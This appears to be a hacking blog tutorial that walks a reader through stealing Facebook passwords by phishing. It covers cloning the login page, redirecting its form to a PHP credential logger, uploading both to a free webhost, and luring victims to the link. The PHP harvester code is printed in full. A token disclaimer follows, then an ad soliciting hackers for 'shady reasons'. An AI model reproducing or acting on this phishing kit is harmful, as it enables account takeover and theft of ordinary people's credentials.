So lets get started..:)
What is Phishing?
Phishing is a technique used by hackers in which they make a fake login page and then they grab the serious information from their victims
It’s a very easy way to hack facebook,yahoo,hotmail,gmail,aol etc accounts and it works very well !
All you need to do is to make a phishing page of the login pages of facebook/gmail etc (which you want to hack) and then tell your victim to login there and once he/she does,you get his/her id (whoaa!)..
Example fb
How to hack a facebook account using phishing?
For hacking facebook with phishing,you need to do two things.
- Creating a Facebook Phishing Page i.e a clone of facebook login page.
- Uploading the phishing page to a free webhost.
How to make a Facebook Phishing page?
For making a facebook phishing page follow the steps below :
- Go to ,wait until the page loads properly and then copy the page source (for copying the page source, right click anywhere on the page,click on view page source and copy the whole piece of code)
- Once you copy the page source so paste it in a notepad file.
- Next search for action=”/login.php?login_attempt=1″ in that notepad file and change it with action =“pass.php”.
- Then save that notepad file as an html file i.e index.html
- Now open a new notepad file,copy the below code and save the file as pass.php
header (‘Location:’);
$handle = fopen(“passwords.html”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);
How to Upload Phishing Page to a Webhost ?
Now,you have to upload your phishing page along with that pass.php file to a webhost.For this search google for free webhosts and you will find many.
But the one I recon is .
- So go to , click on sign up and register an account there. During registeration,select the option “Use a free subdomain” and pick up a free subdomain.
- After registering,you will recieve a message from 000webhost to your email in which there will be your login,ftp account information etc.
- Next login using that account, click on File Manager,go to public_html directory and upload those two files i.e index.html and pass.php
Now all you have to do is to give the link of your free subdomain (which you selected during registration) to your victim and tell him/her to login there.
Once he/she does you will get his/her password in a passwords.html file.For viewing the passwords,you will have to go to : (Change with that free subdomain )
That’s it, so simple and easy!
You can hack many facebook accounts using this phishing technique but I really don’t want that this should be used for illegal purposes.All that you are gonna do with it is at your own risk/choice and I won’t be responsible for any of your actions.
For all you cessant hack fiends that need hackers for all your shady reasons contact, ask no questions get no answers